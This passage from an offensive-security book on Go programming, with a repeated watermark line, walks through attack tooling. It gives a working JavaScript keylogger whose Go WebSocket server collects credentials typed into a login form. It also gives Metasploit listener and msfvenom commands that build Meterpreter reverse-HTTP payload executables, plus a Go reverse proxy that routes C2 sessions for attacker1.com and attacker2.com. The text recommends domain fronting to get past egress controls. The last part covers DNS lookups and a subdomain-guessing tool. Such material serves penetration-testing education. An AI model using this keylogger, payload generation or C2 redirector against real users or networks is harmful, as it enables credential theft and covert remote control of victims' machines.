a client and handle incoming keystrokes. For demonstration purposes, you’ll use JS Bin (http://jsbin.com) to test your payload. JS Bin is an online playground where developers can test their HTML and JavaScript code. Navigate to JS Bin in your web browser and paste the following HTML into the column on the left, completely replac- ing the default code: <!DOCTYPE html> <html> <head> <title>Login</title> </head> <body> <script src='http://localhost:8080/k.js'></script> <form action='/login' method='post'> <input name='username'/> <input name='password'/> <input type="submit"/> </form> </body> </html> On the right side of the screen, you’ll see the rendered form. As you may have noticed, you’ve included a script tag with the src attribute set to http://localhost:8080/k.js. This is going to be the JavaScript code that will create the WebSocket connection and send user input to the server. Your server is going to need to do two things: handle the WebSocket and serve the JavaScript file. First, let’s get the JavaScript out of the way, since after all, this book is about Go, not JavaScript. (Check out https:// github.com/gopherjs/gopherjs/ for instructions on writing JavaScript with Go.) The JavaScript code is shown here: (function() { var conn = new WebSocket("ws://{{.}}/ws"); document.onkeypress = keypress; function keypress(evt) { s = String.fromCharCode(evt.which); conn.send(s); } })(); The JavaScript code handles keypress events. Each time a key is pressed, the code sends the keystrokes over a WebSocket to a resource at ws://{{.}}/ws. Recall that the {{.}} value is a Go template placeholder representing the 前沿信安资讯阵地 公众号:i nf osrc HTTP Servers, Routing, and Middleware 95 current context. This resource represents a WebSocket URL that will populate the server location information based on a string you’ll pass to the template. We’ll get to that in a minute. For this example, you’ll save the JavaScript in a file named logger.js. But wait, you say, we said we were serving it as k.js! The HTML we showed previously also explicitly uses k.js. What gives? Well, logger.js is a Go template, not an actual JavaScript file. You’ll use k.js as your pattern to match against in your router. When it matches, your server will render the template stored in the logger.js file, complete with contextual data that rep- resents the host to which your WebSocket connects. You can see how this works by looking at the server code, shown in Listing 4-9. import ( "flag" "fmt" "html/template" "log" "net/http" "github.com/gorilla/mux" u "github.com/gorilla/websocket" ) var ( v upgrader = websocket.Upgrader{ CheckOrigin: func(r *http.Request) bool { return true }, } listenAddr string wsAddr string jsTemplate *template.Template ) func init() { flag.StringVar(&listenAddr, "listen-addr", "", "Address to listen on") flag.StringVar(&wsAddr, "ws-addr", "", "Address for WebSocket connection") flag.Parse() var err error w jsTemplate, err = template.ParseFiles("logger.js") if err != nil { panic(err) } } func serveWS(w http.ResponseWriter, r *http.Request) { x conn, err := upgrader.Upgrade(w, r, nil) if err != nil { http.Error(w, "", 500) return } defer conn.Close() fmt.Printf("Connection from %s\n", conn.RemoteAddr().String()) 前沿信安资讯阵地 公众号:i nf osrc 96 Chapter 4 for { y _, msg, err := conn.ReadMessage() if err != nil { return } z fmt.Printf("From %s: %s\n", conn.RemoteAddr().String(), string(msg)) } } func serveFile(w http.ResponseWriter, r *http.Request) { { w.Header().Set("Content-Type", "application/javascript") | jsTemplate.Execute(w, wsAddr) } func main() { r := mux.NewRouter() } r.HandleFunc("/ws", serveWS) ~ r.HandleFunc("/k.js", serveFile) log.Fatal(http.ListenAndServe(":8080", r)) } Listing 4-9: Keylogging server (/ch-4/websocket _keylogger /main.go) We have a lot to cover here. First, note that you’re using another third-party package, gorilla/websocket, to handle your WebSocket communications u. This is a full-featured, powerful package that simplifies your development process, like the gorilla/mux router you used earlier in this chapter. Don’t forget to run go get github.com/gorilla/websocket from your terminal first. You then define several variables. You create a websocket.Upgrader instance that’ll essentially whitelist every origin v. It’s typically bad security practice to allow all origins, but in this case, we’ll roll with it since this is a test instance we’ll run on our local workstations. For use in an actual malicious deploy- ment, you’d likely want to limit the origin to an explicit value. Within your init() function, which executes automatically before main(), you define your command line arguments and attempt to parse your Go template stored in the logger.js file. Notice that you’re calling template.ParseFiles("logger.js") w. You check the response to make sure the file parsed correctly. If all is successful, you have your parsed template stored in a variable named jsTemplate. At this point, you haven’t provided any contextual data to your tem- plate or executed it. That’ll happen shortly. First, however, you define a function named serveWS() that you’ll use to handle your WebSocket com- munications. You create a new websocket.Conn instance by calling upgrader .Upgrade(http .ResponseWriter, *http.Request, http.Header) x. The Upgrade() method upgrades the HTTP connection to use the WebSocket protocol. That means that any request handled by this function will be upgraded to use WebSockets. You interact with the connection within an infinite for loop, calling conn.ReadMessage() to read incoming messages y. If your JavaScript works appropriately, these messages should consist of captured keystrokes. You write these messages and the client’s remote IP address to stdout z. 前沿信安资讯阵地 公众号:i nf osrc HTTP Servers, Routing, and Middleware 97 You’ve tackled arguably the hardest piece of the puzzle in creating your WebSocket handler. Next, you create another handler function named serveFile(). This function will retrieve and return the contents of your JavaScript template, complete with contextual data included. To do this, you set the Content-Type header as application/javascript {. This will tell connecting browsers that the contents of the HTTP response body should be treated as JavaScript. In the second and last line of the handler function, you call jsTemplate.Execute(w, wsAddr) |. Remember how you parsed logger.js while you were bootstrapping your server in the init() function? You stored the result within the variable named jsTemplate. This line of code processes that template. You pass to it an io.Writer (in this case, you’re using w, an http.ResponseWriter) and your contextual data of type interface{}. The interface{} type means that you can pass any type of variable, whether they’re strings, structs, or something else. In this case, you’re passing a string variable named wsAddr. If you jump back up to the init() function, you’ll see that this variable contains the address of your WebSocket server and is set via a command line argument. In short, it populates the template with data and writes it as an HTTP response. Pretty slick! You’ve implemented your handler functions, serveFile() and serveWS(). Now, you just need to configure your router to perform pattern matching so that you can pass execution to the appropriate handler. You do this, much as you have previously, in your main() function. The first of your two handler functions matches the /ws URL pattern, executing your serveWS() function to upgrade and handle WebSocket connections }. The second route matches the pattern /k.js, executing the serveFile() function as a result ~. This is how your server pushes a rendered JavaScript template to the client. Let’s fire up the server. If you open the HTML file, you should see a message that reads connection established. This is logged because your JavaScript file has been rendered in the browser and requested a WebSocket connection. If you enter credentials into the form elements, you should see them printed to stdout on the server: $ go run main.go -listen-addr= -ws-addr= Connection from From u From s From e From r From From p From @ From s From s From w From o From r From d 前沿信安资讯阵地 公众号:i nf osrc 98 Chapter 4 You did it! It works! Your output lists each individual keystroke that was pressed when filling out the login form. In this case, it’s a set of user creden- tials. If you’re having issues, make sure you’re supplying accurate addresses as command line arguments. Also, the HTML file itself may need tweaking if you’re attempting to call k.js from a server other than localhost:8080. You could improve this code in several ways. For one, you might want to log the output to a file or other persistent storage, rather than to your ter- minal. This would make you less likely to lose your data if the terminal win- dow closes or the server reboots. Also, if your keylogger logs the keystrokes of multiple clients simultaneously, the output will mix the data, making it potentially difficult to piece together a specific user’s credentials. You could avoid this by finding a better presentation format that, for example, groups keystrokes by unique client/port source. Your journey through credential harvesting is complete. We’ll end this chapter by presenting multiplexing HTTP command-and-control connections. Multiplexing Command-and-Control You’ve arrived at the last section of the chapter on HTTP servers. Here, you’ll look at how to multiplex Meterpreter HTTP connections to different backend control servers. Meterpreter is a popular, flexible command-and-control (C2) suite within the Metasploit exploitation framework. We won’t go into too many details about Metasploit or Meterpreter. If you’re new to it, we recom- mend reading through one of the many tutorial or documentation sites. In this section, we’ll walk through creating a reverse HTTP proxy in Go so that you can dynamically route your incoming Meterpreter sessions based on the Host HTTP header, which is how virtual website hosting works. However, instead of serving different local files and directories, you’ll proxy the connection to different Meterpreter listeners. This is an interesting use case for a few reasons. First, your proxy acts as a redirector, allowing you to expose only that domain name and IP address without exposing your Metasploit listeners. If the redirector ever gets blacklisted, you can simply move it without having to move your C2 server. Second, you can extend the concepts here to per- form domain fronting, a technique for leveraging trusted third-party domains (often from cloud providers) to bypass restrictive egress controls. We won’t go into a full-fledged example here, but we highly recommend you dig into it, as it can be pretty powerful, allowing you to egress restricted networks. Lastly, the use case demonstrates how you can share a single host/port combination among a team of allies potentially attacking different target organizations. Since ports 80 and 443 are the most likely allowed egress ports, you can use your proxy to listen on those ports and intelligently route the connections to the correct listener. Here’s the plan. You’ll set up two separate Meterpreter reverse HTTP listeners. In this example, these will reside on a virtual machine with an IP 前沿信安资讯阵地 公众号:i nf osrc HTTP Servers, Routing, and Middleware 99 address of, but they could very well exist on separate hosts. You’ll bind your listeners to ports 10080 and 20080, respectively. In a real situ- ation, these listeners can be running anywhere so long as the proxy can reach those ports. Make sure you have Metasploit installed (it comes pre- installed on Kali Linux); then start your listeners. $ msfconsole > use exploit/multi/handler > set payload windows/meterpreter_reverse_http u > set LHOST > set LPORT 80 v > set ReverseListenerBindAddress > set ReverseListenerBindPort 10080 > exploit -j -z [*] Exploit running as background job 1. [*] Started HTTP reverse handler on When you start your listener, you supply the proxy data as the LHOST and LPORT values u. However, you set the advanced options ReverseListener BindAddress and ReverseListenerBindPort to the actual IP and port on which you want the listener to start v. This gives you some flexibility in port usage while allowing you to explicitly identify the proxy host—which may be a hostname, for example, if you were setting up domain fronting. On a second instance of Metasploit, you’ll do something similar to start an additional listener on port 20080. The only real difference here is that you’re binding to a different port: $ msfconsole > use exploit/multi/handler > set payload windows/meterpreter_reverse_http > set LHOST > set LPORT 80 > set ReverseListenerBindAddress > set ReverseListenerBindPort 20080 > exploit -j -z [*] Exploit running as background job 1. [*] Started HTTP reverse handler on Now, let’s create your reverse proxy. Listing 4-10 shows the code in its entirety. package main import ( "log" "net/http" u "net/http/httputil" "net/url" 前沿信安资讯阵地 公众号:i nf osrc 100 Chapter 4 "github.com/gorilla/mux" ) v var ( hostProxy = make(map[string]string) proxies = make(map[string]*httputil.ReverseProxy) ) func init() { w hostProxy["attacker1.com"] = "" hostProxy["attacker2.com"] = "" for k, v := range hostProxy { x remote, err := url.Parse(v) if err != nil { log.Fatal("Unable to parse proxy target") } y proxies[k] = httputil.NewSingleHostReverseProxy(remote) } } func main() { r := mux.NewRouter() for host, proxy := range proxies { z r.Host(host).Handler(proxy) } log.Fatal(http.ListenAndServe(":80", r)) } Listing 4-10: Multiplexing Meterpreter (/ch-4 /multiplexer /main.go) First off, you’ll notice that you’re importing the net/http/httputil pack- age u, which contains functionality to assist with creating a reverse proxy. It’ll save you from having to create one from scratch. After you import your packages, you define a pair of variables v. Both variables are maps. You’ll use the first, hostProxy, to map hostnames to the URL of the Metasploit listener to which you’ll want that hostname to route. Remember, you’ll be routing based on the Host header that your proxy receives in the HTTP request. Maintaining this mapping is a simple way to determine destinations. The second variable you define, proxies, will also use hostnames as its key values. However, their corresponding values in the map are *httputil .ReverseProxy instances. That is, the values will be actual proxy instances to which you can route, rather than string representations of the destination. Notice that you’re hardcoding this information, which isn’t the most elegant way to manage your configuration and proxy data. A better imple- mentation would store this information in an external configuration file instead. We’ll leave that as an exercise for you. 前沿信安资讯阵地 公众号:i nf osrc HTTP Servers, Routing, and Middleware 101 You use an init() function to define the mappings between domain names and destination Metasploit instances w. In this case, you’ll route any request with a Host header value of attacker1.com to :10080 and anything with a Host header value of attacker2.com to http:// Of course, you aren’t actually doing the routing yet; you’re just creating your rudimentary configuration. Notice that the destinations correspond to the ReverseListenerBindAddress and ReverseListenerBindPort values you used for your Meterpreter listeners earlier. Next, still within your init() function, you loop over your hostProxy map, parsing the destination addresses to create net.URL instances x. You use the result of this as input into a call to httputil.NewSingleHostReverseProxy (net.URL) y, which is a helper function that creates a reverse proxy from a URL. Even better, the httputil.ReverseProxy type satisfies the http.Handler interface, which means you can use the created proxy instances as handlers for your router. You do this within your main() function. You create a router and then loop over all of your proxy instances. Recall that the key is the hostname, and the value is of type httputil.ReverseProxy. For each key/value pair in your map, you add a matching function onto your router z. The Gorilla MUX toolkit’s Route type contains a matching function named Host that accepts a hostname to match Host header values in incoming requests against. For each hostname you want to inspect, you tell the router to use the corresponding proxy. It’s a surprisingly easy solution to what could other wise be a complicated problem. Your program finishes by starting the server, binding it to port 80. Save and run the program. You’ll need to do so as a privileged user since you’re binding to a privileged port. At this point, you have two Meterpreter reverse HTTP listeners run- ning, and you should have a reverse proxy running now as well. The last step is to generate test payloads to check that your proxy works. Let’s use msfvenom, a payload generation tool that ships with Metasploit, to generate a pair of Windows executable files: $ msfvenom -p windows/meterpreter_reverse_http LHOST= LPORT=80 HttpHostHeader=attacker1.com -f exe -o payload1.exe $ msfvenom -p windows/meterpreter_reverse_http LHOST= LPORT=80 HttpHostHeader=attacker2.com -f exe -o payload2.exe This generates two output files named payload1.exe and payload2.exe. Notice that the only difference between the two, besides the output filename, is the HttpHostHeader values. This ensures that the resulting payload sends its HTTP requests with a specific Host header value. Also of note is that the LHOST and LPORT values correspond to your reverse proxy information and not your Meterpreter listeners. Transfer the resulting executables to a Windows sys- tem or virtual machine. When you execute the files, you should see two new 前沿信安资讯阵地 公众号:i nf osrc 102 Chapter 4 sessions established: one on the listener bound to port 10080, and one on the listener bound to port 20080. They should look something like this: > [*] handling request from; (UUID: hff7podk) Redirecting stageless connection from /pxS_2gL43lv34_birNgRHgL4AJ3A9w3i9FXG3Ne2-3UdLhACr8-Qt6QOlOw PTkzww3NEptWTOan2rLo5RT42eOdhYykyPYQy8dq3Bq3Mi2TaAEB with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko' [*] handling request from; (UUID: hff7podk) Attaching orphaned/stageless session... [*] Meterpreter session 1 opened ( -> at 2020-07-03 16:13:34 -0500 If you use tcpdump or Wireshark to inspect network traffic destined for port 10080 or 20080, you should see that your reverse proxy is the only host communicating with the Metasploit listener. You can also confirm that the Host header is set appropriately to attacker1.com (for the listener on port 10080) and attacker2.com (for the listener on port 20080). That’s it. You’ve done it! Now, take it up a notch. As an exercise for you, we recommend you update the code to use a staged payload. This likely comes with additional challenges, as you’ll need to ensure that both stages are properly routed through the proxy. Further, try to implement it by using HTTPS instead of cleartext HTTP. This will further your understanding and effectiveness at proxying traffic in useful, nefarious ways. Summary You’ve completed your journey of HTTP, working through both client and server implementations over the last two chapters. In the next chapter, you’ll focus on DNS, an equally useful protocol for security practitioners. In fact, you’ll come close to replicating this HTTP multiplexing example using DNS. 前沿信安资讯阵地 公众号:i nf osrc The Domain Name System (DNS) locates internet domain names and translates them to IP addresses. It can be an effective weapon in the hands of an attacker, because organizations commonly allow the protocol to egress restricted networks and they frequently fail to monitor its use adequately. It takes a little knowledge, but savvy attackers can leverage these issues throughout nearly every step of an attack chain, including reconnaissance, command and control (C2), and even data exfiltration. In this chapter, you’ll learn how to write your own utilities by using Go and third-party packages to perform some of these capabilities. You’ll start by resolving hostnames and IP addresses to reveal the many types of DNS records that can be enumerated. Then you’ll use patterns illustrated in earlier chapters to build a massively concurrent subdomain- guessing tool. Finally, you’ll learn how to write your own DNS server and proxy, and you’ll use DNS tunneling to establish a C2 channel out of a restrictive network! 5 E X PL O I T ING DN S 前沿信安资讯阵地 公众号:i nf osrc 104 Chapter 5 Writing DNS Clients Before exploring programs that are more complex, let’s get acquainted with some of the options available for client operations. Go’s built-in net package offers great functionality and supports most, if not all, record types. The upside to the built-in package is its straightforward API. For example, LookupAddr(addr string) returns a list of hostnames for a given IP address. The downside of using Go’s built-in package is that you can’t specify the destination server; instead, the package will use the resolver configured on your operating system. Another downside is that you can’t run deep inspection of the results. To get around this, you’ll use an amazing third-party package called the Go DNS package written by Miek Gieben. This is our preferred DNS package because it’s highly modular, well written, and well tested. Use the following to install this package: $ go get github.com/miekg/dns Once the package is installed, you’re ready to follow along with the upcoming code examples. You’ll begin by performing A record lookups in order to resolve IP addresses for hostnames. Retrieving A Records Let’s start by performing a lookup for a fully qualified domain name (FQDN), which specifies a host’s exact location in the DNS hierarchy. Then we’ll attempt to resolve that FQDN to an IP address, using a type of DNS record called an A record. We use A records to point a domain name to an IP address. Listing 5-1 shows an example lookup. (All the code listings at the root location of / exist under the provided github repo https://github.com/ blackhat-go/bhg/.) package main import ( "fmt" "github.com/miekg/dns" ) func main() { u var msg dns.Msg v fqdn := dns.Fqdn("stacktitan.com") w msg.SetQuestion(fqdn, dns.TypeA) x dns.Exchange(&msg, "") } Listing 5-1: Retrieving an A record (/ch-5/get_a /main.go) 前沿信安资讯阵地 公众号:i nf osrc Exploiting DNS 105 Start by creating a new Msg u and then call fqdn(string) to transform the domain into a FQDN that can be exchanged with a DNS server v. Next, modify the internal state of the Msg with a call to SetQuestion(string, uint16) by using the TypeA value to denote your intent to look up an A record w. (This is a const defined in the package. You can view the other supported values in the package documentation.) Finally, place a call to Exchange(*Msg, string) x in order to send the message to the provided server address, which is a DNS server operated by Google in this case. As you can probably tell, this code isn’t very useful. Although you’re sending a query to a DNS server and asking for the A record, you aren’t processing the answer; you aren’t doing anything meaningful with the result. Prior to programmatically doing that in Go, let’s first review what the DNS answer looks like so that we can gain a deeper understanding of the protocol and the different query types. Before you execute the program in Listing 5-1, run a packet analyzer, such as Wireshark or tcpdump, to view the traffic. Here’s an example of how you might use tcpdump on a Linux host: $ sudo tcpdump -i eth0 -n udp port 53 In a separate terminal window, compile and execute your program like this: $ go run main.go Once you execute your code, you should see a connection to over UDP 53 in the output from your packet capture. You should also see details about the DNS protocol, as shown here: $ sudo tcpdump -i eth0 -n udp port 53 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes 23:55:16.523741 IP > 25147+ A?v stacktitan.com. (32) 23:55:16.650905 IP > 25147 1/0/0 A (48) w The packet capture output produces a couple of lines that require fur- ther explanation. First, a query is being placed from to by using UDP 53 u while requesting a DNS A record v. The response w is returned from Google’s DNS server, which contains the resolved IP address, Using a packet analyzer such as tcpdump, you’re able to resolve the domain name stacktitan.com to an IP address. Now let’s take a look at how to extract that information by using Go. 前沿信安资讯阵地 公众号:i nf osrc 106 Chapter 5 Processing Answers from a Msg struct The returned values from Exchange(*Msg, string) are (*Msg, error). Returning the error type makes sense and is common in Go idioms, but why does it return *Msg if that’s what you passed in? To clarify this, look at how the struct is defined in the source: type Msg struct { MsgHdr Compress bool `json:"-"` // If true, the message will be compressed... u Question []Question // Holds the RR(s) of the question section. v Answer []RR // Holds the RR(s) of the answer section. Ns []RR // Holds the RR(s) of the authority section. Extra []RR // Holds the RR(s) of the additional section. } As you can see, the Msg struct holds both questions and answers. This lets you consolidate all your DNS questions and their answers into a single, unified structure. The Msg type has various methods that make working with the data easier. For example, the Question slice u is being modified with the convenience method SetQuestion(). You could modify this slice directly by using append() and achieve the same outcome. The Answer slice v holds the response to the queries and is of type RR. Listing 5-2 demonstrates how to process the answers. package main import ( "fmt" "github.com/miekg/dns" ) func main() { var msg dns.Msg fqdn := dns.Fqdn("stacktitan.com") msg.SetQuestion(fqdn, dns.TypeA) u in, err := dns.Exchange(&msg, "") if err != nil { panic(err) } v if len(in.Answer) < 1 { fmt.Println("No records") return } for _, answer := range in.Answer { if aw, ok:= answer.(*dns.A)x; ok { y fmt.Println(a.A) } } } Listing 5-2: Processing DNS answers (/ch-5/get_all_a /main.go) 前沿信安资讯阵地 公众号:i nf osrc Exploiting DNS 107 Our example begins by storing the values returned from Exchange, checking whether there was an error, and if so, calling panic() to stop the program u. The panic() function lets you quickly see the stack trace and identify where the error occurred. Next, validate that the length of the Answer slice is at least 1 v, and if it isn’t, indicate that there are no records and immediately return—after all, there will be legitimate instances when the domain name cannot be resolved. The type RR is an interface with only two defined methods, and neither allows access to the IP address stored in the answer. To access those IP addresses, you’ll need to perform a type assertion to create an instance of the data as your desired type. First, loop over all the answers. Next, perform the type assertion on the answer to ensure that you’re dealing with a *dns.A type w. When performing this action, you can receive two values: the data as the asserted type and a bool representing whether the assertion was successful x. After checking whether the assertion was successful, print the IP address stored in a.A y. Although the type is net.IP, it does implement a String() method, so you can easily print it. Spend time with this code, modifying the DNS query and exchange to search for additional records. The type assertion may be unfamiliar, but it’s a similar concept to type casting in other languages. Enumerating Subdomains Now that you know how to use Go as a DNS client, you can create useful tools. In this section, you’ll create a subdomain-guessing utility. Guessing a target’s subdomains and other DNS records is a foundational step in reconnaissance, because the more subdomains you know, the more you can attempt to attack. You’ll supply our utility a candidate wordlist (a dictionary file) to use for guessing subdomains. With DNS, you can send requests as fast as your operating system can handle the processing of packet data. While the language and runtime aren’t going to become a bottleneck, the destination server will. Controlling the concurrency of your program will be important here, just as it has been in previous chapters. First, create a new directory in your GOPATH called subdomain_guesser, and create a new file main.go. Next, when you first start writing a new tool, you must decide which arguments the program will take. This subdomain- guessing program will take several arguments, including the target domain, the filename containing subdomains to guess, the destination DNS server to use, and the number of workers to launch. Go provides a useful package for parsing command line options called flag that you’ll use to handle your command line arguments. Although we don’t use the flag package across all of our code examples, we’ve opted to use it in this case to demonstrate more robust, elegant argument parsing. Listing 5-3 shows our argument- parsing code. 前沿信安资讯阵地 公众号:i nf osrc 108 Chapter 5 package main import ( "flag" ) func main() { var ( flDomain = flag.String("domain", "", "The domain to perform guessing against.") u flWordlist = flag.String("wordlist", "", "The wordlist to use for guessing.") flWorkerCount = flag.Int("c", 100, "The amount of workers to use.") v flServerAddr = flag.String("server", "", "The DNS server to use.") ) flag.Parse() w } Listing 5-3: Building a subdomain guesser (/ch-5/subdomain_guesser /main.go) First, the code line declaring the flDomain variable u takes a String argu- ment and declares an empty string default value for what will be parsed as the domain option. The next pertinent line of code is the flWorkerCount vari- able declaration v. You need to provide an Integer value as the c command line option. In this case, set this to 100 default workers. But this value is probably too conservative, so feel free to increase the number when testing. Finally, a call to flag.Parse() w populates your variables by using the pro- vided input from the user. N O T E You may have noticed that the example is going against Unix law in that it has defined optional arguments that aren’t optional. Please feel free to use os.Args here. We just find it easier and faster to let the flag package do all the work. If you try to build this program, you should receive an error about unused variables. Add the following code immediately after your call to flag.Parse(). This addition prints the variables to stdout along with code, ensuring that the user provided -domain and -wordlist: if *flDomain == "" || *flWordlist == "" { fmt.Println("-domain and -wordlist are required") os.Exit(1) } fmt.Println(*flWorkerCount, *flServerAddr) To allow your tool to report which names were resolvable along with their respective IP addresses, you’ll create a struct type to store this infor- mation. Define it above the main() function: type result struct { IPAddress string Hostname string } 前沿信安资讯阵地 公众号:i nf osrc Exploiting DNS 109 You’ll query two main record types—A and CNAME—for this tool. You’ll perform each query in a separate function. It’s a good idea to keep your functions as small as possible and to have each perform one thing well. This style of development allows you to write smaller tests in the future. Querying A and CNAME Records You’ll create two functions to perform queries: one for A records and the other for CNAME records. Both functions accept a FQDN as the first argu- ment and the DNS server address as the second. Each should return a slice of strings and an error. Add these functions to the code you began defining in Listing 5-3. These functions should be defined outside main(). func lookupA(fqdn, serverAddr string) ([]string, error) { var m dns.Msg var ips []string m.SetQuestion(dns.Fqdn(fqdn), dns.TypeA) in, err := dns.Exchange(&m, serverAddr) if err != nil { return ips, err } if len(in.Answer) < 1 { return ips, errors.New("no answer") } for _, answer := range in.Answer { if a, ok := answer.(*dns.A); ok { ips = append(ips, a.A.String()) } } return ips, nil } func lookupCNAME(fqdn, serverAddr string) ([]string, error) { var m dns.Msg var fqdns []string m.SetQuestion(dns.Fqdn(fqdn), dns.TypeCNAME) in, err := dns.Exchange(&m, serverAddr) if err != nil { return fqdns, err } if len(in.Answer) < 1 { return fqdns, errors.New("no answer") } for _, answer := range in.Answer { if c, ok := answer.(*dns.CNAME); ok { fqdns = append(fqdns, c.Target) } } return fqdns, nil } 前沿信安资讯阵地 公众号:i nf osrc 110 Chapter 5 This code should look familiar because it’s nearly identical to the code you wrote in the first section of this chapter. The first function, lookupA, returns a list of IP addresses, and lookupCNAME returns a list of hostnames. CNAME, or canonical name, records point one FQDN to another one that serves as an alias for the first. For instance, say the owner of the example.com organization wants to host a WordPress site by using a WordPress hosting service. That service may have hundreds of IP addresses for balancing all of their users’ sites, so providing an individual site’s IP address would be infeasible. The WordPress hosting service can instead provide a canonical name (a CNAME) that the owner of example.com can reference. So www .example.com might have a CNAME pointing to someserver.hostingcompany.org, which in turn has an A record pointing to an IP address. This allows the owner of example.com to host their site on a server for which they have no IP information. Often this means you’ll need to follow the trail of CNAMES to eventu- ally end up at a valid A record. We say trail because you can have an end- less chain of CNAMES. Place the function in the following code outside main() to see how you can use the trail of CNAMES to track down the valid A record: func lookup(fqdn, serverAddr string) []result { u var results []result v var cfqdn = fqdn // Don't modify the original. for { w cnames, err := lookupCNAME(cfqdn, serverAddr) x if err == nil && len(cnames) > 0 { y cfqdn = cnames[0] z continue // We have to process the next CNAME. } { ips, err := lookupA(cfqdn, serverAddr) if err != nil { break // There are no A records for this hostname. } | for _, ip := range ips { results = append(results, result{IPAddress: ip, Hostname: fqdn}) } } break // We have processed all the results. } return results } First, define a slice to store results u. Next, create a copy of the FQDN passed in as the first argument v, not only so you don’t lose the original FQDN that was guessed, but also so you can use it on the first query attempt. After starting an infinite loop, try to resolve the CNAMEs for the FQDN w. If no errors occur and at least one CNAME is returned x, set cfqdn to the CNAME returned y, using continue to return to the beginning of the loop z. This process allows you to follow the trail of CNAMES until a failure occurs. If there’s a failure, which indicates that you’ve reached the end of the chain, you can then look for A records {; but if there’s an error, which indicates 前沿信安资讯阵地 公众号:i nf osrc Exploiting DNS 111 something went wrong with the record lookup, then you leave the loop early. If there are valid A records, append each of the IP addresses returned to your results slice | and break out of the loop }. Finally, return the results to the caller. Our logic associated with the name resolution seems sound. However, you haven’t accounted for performance. Let’s make our example goroutine- friendly so you can add concurrency. Passing to a Worker Function You’ll create a pool of goroutines that pass work to a worker function, which performs a unit of work. You’ll do this by using channels to coordinate work distribution and the gathering of results. Recall that you did something similar in Chapter 2, when you built a concurrent port scanner. Continue to expand the code from Listing 5-3. First, create the worker() function and place it outside main(). This function takes three channel arguments: a channel for the worker to signal whether it has closed, a channel of domains on which to receive work, and a channel on which to send results. The function will need a final string argument to specify the DNS server to use. The following code shows an example of our worker() function: type empty struct{} u func worker(tracker chan empty, fqdns chan string, gather chan []result, serverAddr string) { for fqdn := range fqdns { v results := lookup(fqdn, serverAddr) if len(results) > 0 { gather <- results w } } var e empty tracker <- e x } Before introducing the worker() function, first define the type empty to track when the worker finishes u. This is a struct with no fields; you use an empty struct because it’s 0 bytes in size and will have little impact or overhead when used. Then, in the worker() function, loop over the domains channel v, which is used to pass in FQDNs. After getting results from your lookup() function and checking to ensure there is at least one result, send the results on the gather channel w, which accumulates the results back in main(). After the work loop exits because the channel has been closed, an empty struct is sent on the tracker channel x to signal the caller that all work has been completed. Sending the empty struct on the tracker channel is an important last step. If you don’t do this, you’ll have a race condition, because the caller may exit before the gather channel receives results. Since all of the prerequisite structure is set up at this point, let’s refocus our attention back to main() to complete the program we began in Listing 5-3. 前沿信安资讯阵地 公众号:i nf osrc 112 Chapter 5 Define some variables that will hold the results and the channels that will be passed to worker(). Then append the following code into main(): var results []result fqdns := make(chan string, *flWorkerCount) gather := make(chan []result) tracker := make(chan empty) Create the fqdns channel as a buffered channel by using the number of workers provided by the user. This allows the workers to start slightly faster, as the channel can hold more than a single message before blocking the sender. Creating a Scanner with bufio Next, open the file provided by the user to consume as a word list. With the file open, create a new scanner by using the bufio package. The scanner allows you to read the file one line at a time. Append the following code into main(): fh, err := os.Open(*flWordlist) if err != nil { panic(err) } defer fh.Close() scanner := bufio.NewScanner(fh) The built-in function panic() is used here if the error returned is not nil. When you’re writing a package or program that others will use, you should consider presenting this information in a cleaner format. You’ll use the new scanner to grab a line of text from the supplied word list and create a FQDN by combining the text with the domain the user provides. You’ll send the result on the fqdns channel. But you must start the workers first. The order of this is important. If you were to send your work down the fqdns channel without starting the workers, the buffered channel would eventually become full, and your producers would block. You’ll add the following code to your main() function. Its purpose is to start the worker goroutines, read your input file, and send work on your fqdns channel. u for i := 0; i < *flWorkerCount; i++ { go worker(tracker, fqdns, gather, *flServerAddr) } v for scanner.Scan() { fqdns <- fmt.Sprintf("%s.%s", scanner.Text()w, *flDomain) } Creating the workers u by using this pattern should look similar to what you did when building your concurrent port scanner: you used a for loop until you reached the number provided by the user. To grab each line 前沿信安资讯阵地 公众号:i nf osrc Exploiting DNS 113 in the file, scanner.Scan() is used in a loop v. This loop ends when there are no more lines to read in the file. To get a string representation of the text from the scanned line, use scanner.Text() w. The work has been launched! Take a second to bask in greatness. Before reading the next code, think about where you are in the program and what you’ve already done in this book. Try to complete this program and then continue to the next section, where we’ll walk you through the rest. Gathering and Displaying the Results To finish up, first start an anonymous goroutine that will gather the results from the workers. Append the following code into main(): go func() { for r := range gather { u results = append(results, r...v) } var e empty w tracker <- e }() By looping over the gather channel, you append the received results onto the results slice u. Since you’re appending a slice to another slice, you must use the ... syntax v. After you close the gather channel and the loop ends, send an empty struct to the tracker channel as you did earlier w. This is done to prevent a race condition in case append() doesn’t finish by the time you eventually present the results to the user. All that’s left is closing the channels and presenting the results. Include the following code at the bottom of main() in order to close the channels and present the results to the user: u close(fqdns) v for i := 0; i < *flWorkerCount; i++ { <-tracker } w close(gather) x <-tracker The first channel that can be closed is fqdns u because you’ve already sent all the work on this channel. Next, you need to receive on the tracker channel one time for each of the workers v, allowing the workers to signal that they exited completely. With all of the workers accounted for, you can close the gather channel w because there are no more results to receive. Finally, receive one more time on the tracker channel to allow the gathering goroutine to finish completely x. The results aren’t yet presented to the user. Let’s fix that. If you wanted to, you could easily loop over the results slice and print the Hostname and IPAddress fields by using fmt.Printf(). We prefer, instead, to use one of Go’s several great built-in packages for presenting data; tabwriter is one of our favorites. It allows you to present data in nice, even columns broken up by 前沿信安资讯阵地 公众号:i nf osrc 114 Chapter 5 tabs. Add the following code to the end of main() to use tabwriter to print your results: w := tabwriter.NewWriter(os.Stdout, 0, 8, 4, ' ', 0) for _, r := range results { fmt.Fprintf(w, "%s\t%s\n", r.Hostname, r.IPAddress) } w.Flush() Listing 5-4 shows the program in its entirety. Package main import ( "bufio" "errors" "flag" "fmt" "os" "text/tabwriter" "github.com/miekg/dns" ) func lookupA(fqdn, serverAddr string) ([]string, error) { var m dns.Msg var ips []string m.SetQuestion(dns.Fqdn(fqdn), dns.TypeA) in, err := dns.Exchange(&m, serverAddr) if err != nil { return ips, err } if len(in.Answer) < 1 { return ips, errors.New("no answer") } for _, answer := range in.Answer { if a, ok := answer.(*dns.A); ok { ips = append(ips, a.A.String()) return ips, nil } } return ips, nil } func lookupCNAME(fqdn, serverAddr string) ([]string, error) { var m dns.Msg var fqdns []string 